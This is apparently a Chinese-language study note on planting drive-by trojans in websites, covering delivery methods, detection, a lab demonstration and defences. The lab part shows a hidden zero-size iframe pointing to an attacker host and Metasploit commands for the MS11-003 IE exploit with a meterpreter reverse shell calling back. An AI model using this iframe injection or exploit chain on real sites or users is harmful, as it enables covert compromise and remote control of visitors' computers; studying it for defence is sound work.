網站掛馬原理及實戰

• 2020 年 3 月 8 日
• 筆記

注:本文僅供學習參考

網頁掛馬簡介 網頁掛馬指的是把一個木馬程式上傳到一個網站裡面，然後用木馬生成器生成一個網馬，放到網頁空間裡面，再加程式碼使得木馬在打開網頁時運行。

網頁掛馬工作原理 作為網頁掛馬的散布者，其目的是將木馬下載到用戶本地並進一步執行，當木馬得到執行後，就意味著會有更多的木馬被下載，且進一步被執行。這樣就進入一個惡性的循環，從而使用戶的電腦遭到攻擊和控制。為達到目的首先要將木馬下載到本地。

常見方式

1將木馬偽裝為頁面元素，木馬則會被瀏覽器自動下載到本地。    2利用腳本運行的漏洞下載木馬。    3利用腳本運行的漏洞釋放隱含在網頁腳本中的木馬。    4將木馬偽裝成缺失的組件，或和缺失的組件捆綁在一起，如flash播放插件。這樣既達到了下載的目的，下載的組件又會被瀏覽器自動執行。    5通過腳本運行調用某些com組件，利用其漏洞下載木馬。    6在渲染頁面內容的過程中，利用格式溢出釋放木馬，如ani格式溢出漏洞。    7在渲染頁面內容的過程中，利用格式溢出下載木馬，如flash9.0.115播放漏洞。

檢測方式

  1特徵匹配：將網頁掛馬的腳本按腳本病毒進行檢測，但是網頁腳本變形方式、加密方式比起傳統的PE格式病毒更為多樣，檢測起來也更加困難。      2主動防禦：當瀏覽器要進行某些動作時，作出提示，如下載了某插件的安裝包，會提示是否運行。比如瀏覽器創建暴風影音播放器時，提示是否允許運行，大多數情況下用戶會點擊是，網頁木馬會因此得到執行。      3檢查父進程是否為瀏覽器，這種方法很容易被躲過且會對很多插件造成誤報。

網站掛馬實驗 準備win7實驗機和kali kali ip地址為10.1.1.101 1.將以下程式碼插進我們準備的網站中

<iframe src=地址 width=0 height=0></iframe>

將寬度高度都設為0，這個地址就會變成透明，不查看源程式碼的話是發現不了的 這裡的網馬地址設置為http://10.1.1.101:8060/test.html當用戶訪問到我們這個地址時，會自動訪問http://10.1.1.101:8060/test.html，木馬會被瀏覽下載到本地

2.利用ms11_003IE漏洞攻擊win7主機 執行命令

use exploit/windows/browser/ ms11_003_ie_css_import』，選擇漏洞利用EXP  設置SRVPORT URIPATH與網馬中的src一致  set SRVPORT 8060  set URIPATH test.html  運行命令set payload windows/meterpreter/reverse_tcp 設置攻擊載荷進行回連  set lhost 10.1.1.101 設置回連的IP地址  set lport 1234設置回連埠號  show options  最後設置完看下圖

執行run命令 好戲上場 這時打開win7實驗機，打開IE，模擬受害者訪問http://10.1.1.101/index.html

在kali端成功看到受害者主機上線

成功使用sysinfo查看主機資訊

使用Screenshot查看win7實驗機的螢幕截圖(win7待機了)

包括後面收集資訊屬於後滲透環節,本文不做討論。

防禦措施

1對開放上傳附件功能的網站，一定要進行身份認證，並只允許信任的人使用上傳程式。    2保證所使用的程式及時地更新。    3不要在前台網頁加註後台管理程式登錄頁面的鏈接。    4時常備份資料庫等文件，但是不要把備份數據放在程式默認的備份目錄下。    5管理員的用戶名和密碼要有一定複雜性。    6 IIS中禁止目錄的寫入和執行功能，可以有效防止asp木馬。    7在伺服器、虛擬主機控制面板設置執行許可權選項中，將有上傳許可權的目錄取消asp的運行許可權。    8創建一個robots.txt上傳到網站根目錄，Robots能夠有效防範利用搜索引擎竊取資訊的駭客。